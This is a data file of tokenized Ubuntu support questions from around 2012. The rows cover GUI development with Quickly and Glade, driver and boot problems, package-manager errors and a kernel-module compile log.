157186	quickly/glade linking a button to notebook page	hey everyone ( boy i seem to be posting quite a bit ) , i have a question regarding glade and quickly . is it possible to map a button to a notebook within the same program . like say for instance i have a toolbar with a button on it . can i link it to , say page 3 , on the notebook widget ? for instance , i have a button on my toolbar . while i know how to map it to external programs , i am uncertain as to how i would map it to page 3 ( an example in this case ) . i do n't want to open another window ( already can do that ) , but i do not know how to link it to something already in the program .
157188	when will it be possible to move the unity launcher to the bottom of the screen ( 12.04 )	after upgrading from 11.10 og 12.04 , the possibility of moving the unity launcher to the bottom of the screen disappeared . the measure to move the launcher in 11.10 was to install the unity shell rotated plugin but it is not possible to install it in ubuntu 12.04 . any idea when this problem might be fixed ?
157195	force rewrite of gnome-do summon binding on login because keeps being set to disabled	i was wondering where the gnome-do binding was stored for summon do . i want to rewrite this on login because it keeps getting overwritten when i have it stored as space to disabled . where is this setting stored and how do i go about rewriting it ?
157196	unable to use package manager due to `` exclusive lock '' error	my synaptic package manager in ubuntu10.10 is giving error : unable to get exclusive lock this usually means that another package management application ( like apt-get or aptitude ) is already running . please close that application first . please resolve my problem for opening synaptic package manager
157197	how do i install graphic drivers for a radeon xpress200 ?	i downloaded the drivers from support.amd.com , but i ca n't figure out how to install them . i have a monitor with a resolution of 1440x900 and i 'm trying to get the correct resolution to show up . when i go to display settings only 1024x768 and 800x600 show up in the options . i 'm very new to linux and am liking it so far , but this is the only problem i 'm having ... any help would be appreciated !
157199	how to use primary selection with tilda/terminal	let me make my question a little bit more clear . i am a linux noob and still trying to get the feel on linux command line . i use tilda as my drop-down terminal . suppose , i enter a command in terminal and than i have to make a quick search of the result of the command 's output . let 's suppose the output resulted in an error . now , currently what i do is select the complete error and than right-click copy to copy the contents which i believe is not a effecient way . so , while reading on internet i came accross that there is a primary clipboard feature in which whatever is under selection is copied . my question is how do i enable this feature in my terminal ( tilda or gnome ) only or is this something in-built by default . if yes how to use it . i want this feature only for my terminal and not for rest of all my applications if it is possible .
157206	dowloaded wubi.exe but it does n't run on my asus 1005p ee pc running windows 7	i want to install ubuntu 12.04 lts along side windows 7 on my asus 1005p eee pc . i tried to install it with the live usb created with the `` universal-usb-installer-1.9.0.2.exe '' but failed . alternatively , i downloaded the `` wubi.exe '' installer from www.ubuntu.com , but it does not run on my pc . is this version of ubuntu incompatible for the given hardware for side by side installation with windows 7 ?
157211	is virtuoso-t restarting indexing after every boot ?	virtuoso-t is indexing my files again , which takes a massively long time with all my cd 's ripped to flac and converted to mp3 and ogg , not to mention all other files on the system . pid user pr ni virt res shr s % cpu % mem time+ p command 3416 jhendrix 39 19 508m 142m 5060 r 99.1 1.8 47:10.40 1 virtuoso-t why is it indexing all files again ? my pc sounds like a vacuum cleaner right now . i know i can kill the process , but i want to know why it is happening .
157214	what happened to my kde task bar ? how can i get it back ?	i installed a 32bit kubuntu on my netbook ( aspire one 150 ) and the first logon after the installation was just fine . however , after applying some upgrades , turning off the effects etc , i have some kind of `` launcher '' with the task bar ( or something like it ) at the top , a button named `` menu '' at the top left and when i click that button i get a `` close '' menu entry , but clicking that yields no result whatsoever ? there are something like tabs in that launcher , the first named `` search and launch '' , the second `` page one '' . how can i get the usual kde desktop back ?
157216	is it safe to install gimp 2.8 from a ppa ?	i tried using sudo add-apt-repository ppa : otto-kesselgulasch/gimp and got this message : [ sudo ] password for neil : you are about to add the following ppa to your system : caution ! this ppa could break your installed os if you use ubuntu series < precise . there are dependency issues for oneiric ocelot ( 11.10 ) . only use it if you know what you do ! there are known issues in precise pangolin ( 12.04 ) . regards more info : https : //launchpad.net/~otto-kesselgulasch/+archive/gimp press [ enter ] to continue or ctrl-c to cancel adding it
157220	compile a java program as different user	i am able to login as a different user using a shell script in ubuntu , but i want to run a java program in that user , but it halts there ... for example : login as a guest user with limited permission compile helloworld.java java helloworld.java the script i wrote : user=sameek su $ user javac helloworld.java echo compiled kindly show me a path to solve this problem
157222	external display not detected on lenovo t520	in ubuntu 12.04 64bit , i installed nvidia-current-updates and enabled the discrete nvidia card only in bios ( optimus completely disabled ) . ubuntu uses the nvidia driver but fails to detect an external dell lcd u2311 connected to the display port . in windows everything runs smoothly , it 's only a sw problem . in displays window i can see only a laptop screen and detect displays does nothing .
157223	12.04 does not detect eth0 ( atheros ar8162 )	installed 12.04 on dell inspiron 5420 . wifi is working however wired connection does not work . in fact i ca n't see eth0 . can i know the correct driver to install ?
157228	how do i use the unity methods in quickly 's python code ?	how do i use the unity methods in quickly 's python code . all i want is an example of a few methods , like quicklists , notifications , indicators , etc .
157229	java_home is not defined correctly	i installed java jdk hotspot 1.7 . when i type java -version i am getting : java version `` 1.7.0 '' java ( tm ) se runtime environment ( build 1.7.0-b147 ) this is correct . and i tried to install maven , and added to etc/environment file : java_home=/usr/lib/jvm/jdk1.7.0 m2_home=/usr/local/apache-maven/apache-maven-3.0.4 maven_home=/usr/local/apache-maven/apache-maven-3.0.4 m2=/usr/local/apache-maven/apache-maven-3.0.4/bin now when i type mvn i am getting : error : java_home is not defined correctly . we can not execute ”/usr/lib/jvm/jdk1.7.0”/bin/java however i am not putting `` mark for jav_home var in environment file . it is trying to run from ”/usr/lib/jvm/jdk1.7.0”/bin/java path , actually it should be /usr/lib/jvm/jdk1.7.0/bin/java when i command $ java_home i am getting : bash : ”/usr/lib/jvm/jdk1.7.0” : no such file or directory i am sure the path ( /usr/lib/jvm/jdk1.7.0 ) is correct . please advise how to fix . thanks in advance
157232	installing ubuntu in a partition made previously	i bought a toshiba laptop with two partitions : c : with windows 7 and d : with my data . i want ubuntu 12.04 be installed in d : but when i try the computer shows me c : divided in two parts . if i choose something else and select /dev/sda3 a message appears : there is not a root file system . what can i do ?
157239	my password not accepted by applications	i installed ubuntu 12.04 using mini.iso and i installed gnome 3 , and bleachbit and remastersys etc . when i open these applications from menu , and it ask for password . i entered password and it does not accepting and says `` incorrect password '' . but , i could enter password through terminal and run above mentioned applications . how can i bypass the problem ?
157241	wine 1.5.7 from ubuntu wine ppa does n't work	i 've been using wine from the ubuntu wine ppa for months now , but the last update 1.5.7 seems to be broken . i 'm running ubuntu 12.04 x86 ( 32 bit ) . when i try to run any application under any of the wineprefix i have installed in my $ home i get this : getting server_pid from lock 23758 wine : can not get pid from lock ( lock is n't locked ) err : process : start_wineboot failed to start wineboot , err 1359 getting server_pid from lock 23758 wine : can not get pid from lock ( lock is n't locked ) i can open winecfg in any of these wineprefix using wibom-gtk ( a profiles manager ) but wine seems to be ignoring any configuration like virtual desktop . especially in the devices tab , where nothing appears : '' failed to connect the mount manager , the unit configuration ca n't be edited '' ( not exactly these words , since i use the catalan locale ) . what i have tried , in my desktop and my netbook ( the problem happens in both ) : removing my wineprefix and generating them does n't work . downgrading tho wine 1.4 from the ubuntu-wine-ppa does n't work . purging the ppa and downgrading to wine 1.4 from the ubuntu repository ( not the wine one , but the official ubuntu default ppa ) seems to work . but it let me stuck with an older version of wine without all the functionalities the latest versions have ( better sound and directx support ) . i 'd like to know if this is a temporary mistake by some kind of error compiling the latest wine in the repo , or if the problem is related to my system . any help would be appreciated , thanks people !
157246	webview load specific url ( quickly/glade )	i was watching the ubuntu developer video about creating your own browser using webkit , but i was wondering if it would be possible to make webkit load a specific website . for instance , if i was to click on the tab `` page 3 '' in my notebook , is there a way to tell webkit to load a specific url ? any help would be greatly appreciated . i have looked around for a solution , but was unable to find any .
157247	gtk+ custom accelarator groups	i have successfully manage to add an accelerator to a menu item with the gtk_widget_add_accelerator ( ) function . what bothers me is how i can add a custom accelerator that widget.with the first command i can add a shortcut like `` ctrl + a '' ; but what happens if i want to use the `` up '' arrow key or f1 as an accelerator ?
157249	why does everyone insist that ruby be installed via rvm and not by compiling ?	i just installed ruby on my 12.04 machine by compiling from the tarball file i got from the official ruby site . i want to know why doing that was a bad idea if i do n't plan on using multiple versions of ruby anytime in the future ?
157256	ca n't launch desura due to `` permission denied '' error	nothing happens when i click desura , clicking force update works but that does not fix the problem . edit : i know am getting this error : details : failed to execute child process `` /home/neil/downloads/desura '' ( permission denied )
157259	why am i not able to install a lot of programs from the software center ?	for a lot of programs , i get this error to check my internet connection :
157269	getting rid of encrypted swap ?	i recently installed ubuntu 12.04 , including a encrypted root and swap partition . i 'd like to get rid of the encrypted swap partition ( not just of the encryption for it , but of the whole swap partition ) . i commented the swap partition out in /etc/fstab , but on system boot i am still asked for the password to the swap partition -- it seems like i need to disable the mounting of the swap partition by the crypt wrapper or whatever it may be called . can someone please tell me how to do this ? i have tried commeting out the swap partition in /etc/crypttab by using a `` # '' as the first character in the relevant line . still getting asked for the swap password on boot . is n't `` # '' a comment in /etc/crypttab , or is there even more i have to do ?
157273	open_counter returned with error 19	i am trying to use perf tool . i have installed ubuntu 12.04 on pandaboard . after booting up the system , installed linux-tools . which installed linux-tools-3.0.0-25 . running the perf , gives following error . perf_3.0.0-25 stat ls error : open_counter returned with 19 ( no such device ) . /bin/dmesg may provide additional information . fatal : not all events could be opened . how do i fix the above problem ? did anyone get the perf to work on any ubuntu releases on pandaboard ? i can use any build if perf and cpufreq are available . i am a newbie to linux/ubuntu . any help is appreciated . thank you
157277	quickly & ubuntu app developer : returns `` state : failed to build ''	i created an app for the ubuntu app showdown and i 'm trying to upload it to the ubuntu software center . my steps are : quickly submitubuntu go to the app page ubuntu app developer website and upload the package .tar.gz created by quickly in the step # 1 . then i receive this email : http : //paste.ubuntu.com/1064804/ it says : `` state : failed to build '' . i tried to add the libglib2.0-bin dependence , but i get the same result . any idea , please ? will be the app submit with this error ? thanks in advance !
157278	getting my router homepage instead of showing my apache site	all in the title , hello askubuntu , there is my problem : when i try to access my apache website from my ip address i got the router homepage , please help i 'm using ubuntu 12.04 lts , apache2 , and my router is sagem f @ st 1704
157281	how do i add an icon to the unity dock ( not drag and drop ) ?	i am creating a custom ubuntu live cd and i want to add a few items to the default dock . i think there must be something i can put in /etc/skel so that when the 'ubuntu ' user is created at boot time it already has a customised dock . there are several posts about creating a .desktop file and putting it in .local/share/applications and then dragging it into the dock . this does not help me as it would mean that the livecd user would have to do the dragging and dropping . is there a setting file that lists what is currently shown in the dock ? ideally i want something that works on unity and unity-2d .
157283	how to change gtkwidget background in gtk3 ?	i 'm trying to use override_background_color on some gtk3 widgets but they still showing up with the default background color .
157286	how to apply gradient background to gtkwidget in gtk3 ?	is it possible to use gradient as a background for generic gtkwidget ? related question : how to change gtkwidget background in gtk3 ?
157290	how to draw on mouse click in gtk.drawingarea using pygi	i am writing a small application using pygi which will interactively draw a line on a gtk.drawingarea between mouse clicks . but i am unable to figure out how to draw using the cairo context at the coordinates returned by the mouse click event . how should the drawing be handled from 'button-press-event ' to draw a pattern similar to that produced by the 'draw ' callback in the attached code ? class myapp ( gtk.window ) : def __init__ ( self ) : gtk.window.__init__ ( self , title= '' draw on button press '' ) self.set_size_request ( 800 , 500 ) self.connect ( 'delete-event ' , gtk.main_quit ) self.drawing_area = gtk.drawingarea ( ) self.drawing_area.add_events ( gdk.eventmask.button_press_mask ) self.drawing_area.connect ( 'draw ' , self.on_drawing_area_draw ) self.drawing_area.connect ( 'button-press-event ' , self.on_drawing_area_button_press ) self.drawing_area.show ( ) self.add ( self.drawing_area ) self.show_all ( ) def on_drawing_area_button_press ( self , widget , event ) : print `` mouse clicked ... at `` , event.x , `` , `` , event.y # how to draw a line starting at this point on the drawing area ? return true def on_drawing_area_draw ( self , drawing_area , cairo_context ) : cairo_context.move_to ( 50 , 50 ) cairo_context.rel_line_to ( 0 , 200 ) cairo_context.rel_line_to ( 200 , 0 ) cairo_context.rel_line_to ( 0 , -200 ) cairo_context.set_source_rgb ( 0 , 0 , 0 ) cairo_context.stroke ( ) return false app = myapp ( ) gtk.main ( )
157292	do you need a shell program for proxy forwarding ?	i am trying to set up a secure proxy for my work . this article suggests using ssh tunnel + socks proxy forwarding . do i need to have access to a certain shell program on the server ? i have bash , tcsh , and zsh available .
157293	i need a file : /etc/apache2/sites-available/default-ssl	i need that file 's ( /etc/apache2/sites-available/default-ssl ) contents or a way to get it back . i deleted it .
157294	~/.bashrc return can only 'return ' from a function or sourced script	i am trying to setup a openstack box to have a look at openstack object storage ( swift ) . looking through the web i found this link ; http : //swift.openstack.org/development_saio.html # loopback-section i followed the instructions line by line but stuck on step 7 in the `` getting the code and setting up test environment '' section . when i execute ~/.bashrc i get ; line 6 : return : can only 'return ' from a function or sourced script . below is the line 6 extract from ~/.bashrc . my first reaction is to comment this line out , but i dont know what it does . can anyone help ? # if not running interactively , dont't do anything [ -z `` $ ps1 '' ] & & return i 'm running ubuntu 12.04 as a vm on hyper-v if knowing that is useful .
157295	correctly packaging for /opt with dh_make	i know , this has already been asked a few times , but it does n't seem to cover my case yet . i 'm trying to package a mono-application to run from /opt . first , i tried these guides : https : //wiki.ubuntu.com/packagingguide/mono http : //developer.ubuntu.com/2012/02/how-to-prepare-a-compiled-application-for-ubuntu-software-center/ but they do n't seem to do the job . the problem i see is that dh_make does n't seem to like building packages that are installed in /opt . it always applies its own prefix to the path ( /usr/ ) and puts the files in the usual directorys ( bin/share/lib ) . but what i want is a flat layout just as i have it usually when building directly with monodevelop . how can i do that with dh_make ? do i have to create the debian/rules file manually to force installation to /opt ?
157300	i am having trouble booting 12.04 keyboard and little man in circle appears and then nothing	i have a new system ( asus 990fx mother board , 2 western dig drives , 32 gb memory , an asus nvidia video card ( geforce gtx560 ) , and an asus dvd burner ( 24b1st ) ) i am struggling to get the 12.04 cd to work . i have been able to see the little man inside a circle and a graphic of a keyboard ? with an == sign between them . is this is a clue ? what does it mean ? after that the mauve screen with keyboard and little man in circle goes away . i get a dark background and underline cursor ... even hear some work being done reading the rom ... . but nothing appears on the screen . i have n't even got to the point where the graphic card is displaying improperly ... it is just not displaying anything . if any kind soul has an idea about how to proceed , i am all ears . btw , i have posted the issue to asus ... waiting for reply .
157303	why does ubuntu boot into a text prompt ?	so i 've always wanted ubuntu along with windows 7 and finally i went to try and make my computer that last night . ( ( i 'll just skip the long story. ) ) i loaded ubuntu from cd , version 12.04 and it loaded fine and then i clicked the install icon . it asked me witch option i would like to proceed with , and i answered ubuntu , in windows 7 . so it did everything rather quickly , and restarted itself ; upon restarting itself it ejected the cd , and i thought everything was good to go . it brought me to the option to either load ubuntu or windows , i was thinking to myself wow that was alot easier than i thought ; windows 7 loads fine after it checked the hdd but when i go to load ubuntu it brings me to the loading screen and then stays there for a long period time , finally moves on as if it was going to load into the regular dashboard , but loads into a dos looking thing . ( ( i 'm sorry if i sound retarded explaining everything i 'm not great with computers ) ) and at the very time it says something like installation failed . it also says it could not find a file or something like that . if you need me to go back and get the full message and put it up here i will . but if i put the cd in it loads fine . thanks in advance for everyone that helps me solve this problem .
157305	nautilus left pane sidebar not showing	in ubuntu 12.04 , my nautilus sidebar is not visible . how can i restore it ?
157306	ubuntu one android - could not get volume	everytime i refresh my data in the ubuntu one app for android i get a message `` error : could not get volume . ressource not found . '' what can i do ? thanks
157318	putty on virtual box ubuntu	i 'm trying to get putty working on ubuntu virtual box but it is n't working . i looked at the other post and it said to switch to bridged adapter which i did , and to no avail did it work . i tried updating the virtual box only driver for windows , but again no solution .
157319	boot an up-to-date ubuntu linux os from cdrom or dvd	i want to take my current , up-to-date ubuntu os on my laptop , put it on a cdrom or dvd , and boot diskless from the cdrom or dvd , saving any data i accumulate to usb memory stick . is there a way to deconstruct the ubuntu live cdroms and add in the current .deb files to do this ? perhaps a ram disk in memory to install into ?
157320	save to hard drive instead of bootable usb	i followed the instructions on the ubuntu website on how to put ubuntu 12.04 on a usb and make it a bootable usb stick for windows . it worked fine and i can boot up and run ubuntu , but every time i try to download software or change settings it tries to save it to the usb rather than the hard drive built into the computer . the usb does n't have enough space so the download fails and in addition it does n't retain setting changes so when i restart my computer all the settings return to default and anything i saved is gone . is there any way to change things so that when i download software or change settings ubuntu will save it to my hard drive instead of the usb ?
157321	can i set a custom horizontal width for a gnome panel ?	is there some way to specify a custom size for a gnome panel ? i 'm using gnome classic on ubuntu 12.04 . there is an `` expand '' option , but i want to exactly specify the size of the panel . i 'm not talking about the height , but rather the width of a horizontal panel .
157331	can not get ubuntu 12.04 to sleep or suspend on toshiba satellite l35	suspend works ok in windows xp on this computer , but not in ubuntu 12.04 .
157334	quickly/glade autoadjust text position	in quickly/glade , is it possible to keep the text ( well , labels ) centered , so when i maximize my program 's window , the text stays centered ? it 's probably something easy to do , but i have been unable to find where to auto-adjust the position . any help would be greatly appreciated .
157337	how does apt-get/aptitude update determine what package lists to update ?	the context is a bug in which ubuntu are updating package list timestamps every 30 minutes on their archive mirrors , which forces [ apt-get|aptitude ] update commands to download package lists though they have n't changed : the size of apt-get update lists is too big http : //bugs.launchpad.net/launchpad/+bug/1001780 the proposed workaround is to run touch over the affected index files prior to running apt-get update . this make their timestamps current , and avoids having to re-download them . this speeds processing by up to several minutes ( 2-3 seconds vs. 2-6 minutes in various tests ) . this despite running a local apt-cache-ng proxy . we 're running into this testing ( mostly ) and deploying ( somewhat ) ubuntu-based images for our aws infrastructure in which apt-get update runs a couple of times . 3-6 minutes vs. 3-20 seconds makes a big difference in our iteration time . it seems odd to me that apt does n't rely on filesize or hashes to determine whether or not files have changed . timestamps are very trivially modified , and seem awfully brittle to base this behavior on .
157339	how to save my certified ubuntu 11.10 which came with the computer	i have bought a computer with ubuntu 11.10 and now i need to install windows xp alonside it . is it possible to save my certified ubuntu configuration onto a usb stick , then unistall ubuntu , install windows and reinstall ubuntu ? if so , can you tell me , how to do it ? thanks for any hints without using complicated terminology .
157343	how do i cancel a time-delayed screenshot ?	i 'm using the default screenshot application that comes with ubuntu gnome-screenshot when i was using it earlier to take screenshots of the lock screen i had set a long time delay , but forgot to change it back after i 'd finished . when i next took a timed screenshot i had to wait a long time for it to take because the delay was still set so long . clicking the icon to relaunch the screenshot application has no effect whilst the timer is in effect , i imagine there is probably a simple terminal command to shut down an application , but i do n't know it ! is there a way to do this ?
157349	how can i restore my boot screen in ubuntu 12.04 ?	i installed kubuntu on my ubuntu 12.04 installation ... big mistake ! it has now changed my boot screen ( boot prior to lightdm login screen ) how can i restore this back to ubuntu login ? nvidia drivers ! thanks
157350	allow a program to edit the current wallpaper	is there a way to allow a wine-based program to edit the actual ubuntu wallpaper ? i want to use a calender printing the dates on the wallpaper . it works for windows but i can not set the changes for ubuntu . i have switched from windows 7 to ubuntu 12.04 couple of days ago . thank you
157351	adding button to grid in quickly	in glade i made a grid 3x3 ad name it grid , i got instance of grid with self.grid = self.builder.get_object ( `` grid '' ) and then i want to add for example a button on that grid when some other button named toolbuttonadd is clicked def on_toolbuttonadd_clicked ( self , widget , data=none ) : button = gtk.button ( ) self.grid.add ( button ) and the problem is that button is not showing what evere i do . i even try with adding button to a box , with same result .
157356	what should i do when i see âplease report this bugâ ?	an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_oneiric-updates_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened .
157371	easiest way to setup a smtp server to receive mail ?	i want to setup a smtp server to receive all mails . i have only found mail sending software so far ( like postfix ) . but i want to have software to make the server being able to receive mails . bonus points if it could work like temporary mailsites , like mailinator.com ( i know , but no dns mx forwarding advice please ) and fakemailgenerator.com .
157372	how can i cleanup a botched truecrypt installation ?	i made the mistake of downloading the x64 version of truecrypt and trying to install it when i 'm actually running the 32-bit version of precise pangolin . i want to clean up the files that i am unable to use , but of course i ca n't just run the uninstall since truecrypt could not be installed in the first place . i am new to this but i have spent some time researching the command line . when i run `` locate trucrypt -i '' in the terminal i receive several relevant files in the usr/bin and usr/share directories . no `` rm '' commands work on these listed files -- i only get `` no such file or directory '' back . i 'm sure this has something to do with permissions but i do n't know what i 'm missing here . why is it i can not find these files through the gui ( even when i select `` show hidden files '' ) or when i try to navigate to these files via the terminal using cd and ls commands ? how can i remove these files ( they are there are n't they ? ) , one way or another , from my system ? your patience and time are appreciated
157380	ubuntu 12.04 amd64 kernel 3.5 and fglrx	does anyone know how to install fglrx with the 3.5.x kernel ? i can live with gallium , an i do n't mind dual booting , but i would really love to see better 3d acceleration !
157381	in ssh , how do i mv to my local system ?	probably bad searching/not knowing the terminology , but : i 've managed to ssh into my webhost 's directory for me , and tar the webapp i want to back up and download . but when i try to mv to ~/mydirectory/backups or mv to /home/mydirectory/backups , it defines the `` home '' as my root on the webhost that i 'm ssh'ed into . how do i mv in ssh to a local drive while still `` inside '' the webhost 's system ?
157384	quickly add scrolling to window	while creating my ubuntu application , i wanted to add in several images and then allow the user to scroll through them . the problem i am having , is that it just cuts the image off , and there are no overlay scrollbars . i even have the scrolledwindow function in there . i could manually link separate pages to the articles , but i would like it to be all on one page to save room . i was greatly appreciate any help regarding this situation .
157385	how do i swap esc and capslock on a command-line system ?	i want to swap the caps lock and escape key as specified in this answer : use the keyboard preferences to swap caps lock and escape - seriously , how often do you use caps lock ? using vim you will be using escape all the time , and having it available on the home row makes a huge difference . with the standard ubuntu desktop , go through the menus : system - > preferences - > keyboard - > layouts tab . then hit the `` layout options '' button , click on the triangle next to `` caps lock key behaviour '' and select `` swap esc and capslock '' . but , i 'm using ubuntu server with no gui , so how would i do this from the command line ?
157386	create a launcher icon for ps3 media server	hi i was wondering how i could create a shortcut for ps3 media server on my unity dash instead of having to load pms.sh every time i want to load the app.any suggestions are greatly appreciated .
157387	ubuntu12.4 ( quantal ) powerpc logon	i work with a thrift store and we have an apple g3 ibook ( dual usb ) donated with some version of ubuntu . i downloaded the 12.4 version and the system asks for a password and username in the first screen . i am not a linux/ubuntu expert . need some help in either a . change the username/login or better b . remove the pw requirement . this will allow us to sell the machine , which has an airline card etc in it . cheers vichu ps : to save bandwidth , please feel free to send me an email dierctly .
157388	application wo n't run when installed in `` /opt ''	i 've developed a program for the app developer showdown , with quickly , in python , and it works as expected when i package and install it normally -in /usr . however when packaged for installation in /opt it does n't run -and i 'm not getting ( or ca n't find ) an error message of any sort , as to what the problem might be . i was wondering if someone here has the answer . the app does require root access -using gksudo- to function . application : https : //launchpad.net/aplomb
157392	fixing right-click context menu ( sublime text 2 )	after a botched attempt to update sublime text 2 , i 've managed to recover and reinstall , but ubuntu 12.04 's context menu `` pointers '' seem to be screwed up : the right-click will still list `` sublime text 2 '' as the first `` open with '' option , but clicking on it results in ... nothing . no launch , no reaction at all . clearly something is n't pointing to something in the right way any more . how do i tell the right-click launcher where to point for the `` correct '' sublime text 2 ?
157395	ubuntu 12.04 ca n't login-tty console said : -bash : /usr/bin/byobu/-launch : no such file or directory	i face problem in login to ubuntu 12.04 . i think it 's caused by accessing super user ( if not wrong ) . i type sudo nautilus to put a background to burg , but i fail x_x . after reboot , i ca n't login to desktop . but i can login as guest . i had 'googling ' for problem solving . most of it is login to screen like terminal ( maybe tty console ) by pressing ctrl+alt+f1 . but after i login system says : -bash : /usr/bin/byobu/-launch : no such file or directory help help help : (
157402	where do i get the source code to customize unity ?	so one of the main reasons i migrated to ubuntu 12.04 from windows 7 was to be able to have more control over my system due to the flexibility and customizability of a linux operating system . however , with ubuntu i do not feel as if i am as in control as i can be . what i mean to say is , where are the source codes and everything for all of this that i can edit on my machine . for example , suppose i want to position my dock on the left to be on the right without wanting to install any new software . i simply want to see the gui files and reposition it myself . how can i do that , if that 's even possible ? thank you !
157407	is there a ubuntu program that can convert cbz to jpg ?	in order for me to read my comics on my psp i need to convert them into jpg format . the official format of my comics is cbz , and i cant convert online because all the comics are about 7 gigabytes .
157408	kernel module compiling error	sh @ ubuntu : /home/ccpp/helloworld $ make gcc-4.6 -o2 -dmodule -d_kernel_ -w -wall -wstrict-prototypes -wmissing-prototypes -isystem /lib/modules/`uname -r`/build/include -c -o hello-1.o hello-1.c hello-1.c:4:0 : warning : `` module '' redefined [ enabled by default ] < command-line > :0:0 : note : this is the location of the previous definition hello-1.c:6:0 : warning : `` _kernel_ '' redefined [ enabled by default ] < command-line > :0:0 : note : this is the location of the previous definition in file included from /lib/modules/3.2.0-25-generic/build/include/linux/list.h:4:0 , from /lib/modules/3.2.0-25-generic/build/include/linux/module.h:9 , from hello-1.c:7 : /lib/modules/3.2.0-25-generic/build/include/linux/types.h:13:2 : warning : # warning `` attempt to use kernel headers from user space , see http : //kernelnewbies.org/kernelheaders '' [ -wcpp ] in file included from /lib/modules/3.2.0-25-generic/build/include/linux/module.h:9:0 , from hello-1.c:7 : /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘init_list_head’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:26:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:27:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘__list_add’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:41:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:42:5 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:43:5 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:44:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_add’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:62:28 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_add_tail’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:76:22 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘__list_del’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:88:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:89:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘__list_del_entry’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:101:18 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:101:31 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_del’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:106:18 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:106:31 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:107:7 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:108:7 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_replace’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:125:5 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:125:17 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:126:5 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:127:5 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:127:17 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:128:5 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_is_last’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:179:13 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_empty’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:188:13 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_empty_careful’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:206:31 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:207:40 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_rotate_left’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:219:15 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_is_singular’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:230:35 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:230:49 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘__list_cut_position’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:236:37 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:237:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:237:19 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:238:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:239:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:240:7 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:241:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:242:11 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_cut_position’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:265:8 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘__list_splice’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:277:32 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:278:31 : error : dereferencing pointer to incomplete type 